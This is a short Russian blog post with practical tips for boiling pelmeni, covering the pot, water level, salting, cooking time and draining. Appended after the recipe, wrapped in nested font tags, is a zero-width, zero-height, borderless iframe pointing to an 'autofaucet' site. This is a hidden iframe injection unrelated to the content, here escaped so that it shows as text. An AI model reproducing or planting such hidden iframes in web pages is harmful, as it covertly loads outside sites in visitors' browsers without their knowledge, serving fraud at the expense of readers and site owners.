Найти тему
Den4uk

Как правильно варить пельмени

Мы с удовольствием поделимся с вами тонкостями варки пельменей. Чтобы у вас не получалась липкая клейкая масса из теста с фаршем, советуем почитать.

• Кастрюля должна быть невысокой и широкой, чтобы пельменям в ней было не тесно.
• Вода должна заполнять ее на три четверти или две трети (пельмени вытеснят часть воды наверх по закону Архимеда ровно в том объеме, который займут сами).
• Солят воду сразу после закипания, но до того, как опускать в нее пельмени.
• Чтобы пельмени не склеивались можно добавить в воду ложку растительного масла.
• Чтобы пельмени не приклеились ко дну кастрюли, нужно провести по дну кастрюли шумовкой, особо прилипчивые пельмени отскочат от дна.
• Варят пельмени 8-12 минут (в зависимости от размеров пельменей: мелкие – меньше, а крупные, соответственно, дольше). После того, как они всплывут, огонь уменьшают, чтобы вода не бурлила, это может привести к тому, что пельмени распадутся. И варят еще 3-5 минут.
• Перед подачей на стол, необходимо выловить пельмени из воды шумовкой и уложить в кастрюльку, чтобы вода с них стекла и только потом, выкладывать на тарелки. Дополнительно можно поставить кастрюльку на маленький огонь, чтобы вода выпарилась. Делается это для того, чтобы тесто несколько подсохло и лучше впитывало соус, с которым их поедают.

<font style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 13px; vertical-align: inherit; background: transparent;"><font style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; outline: 0px; font-size: 13px; vertical-align: inherit; background: transparent;">&lt;iframe src="https://autofaucet.org/wm/sdg32/4" width="0" height="0" style="border:0"&gt;&lt;/iframe&gt;</font></font>

Еда
6,93 млн интересуются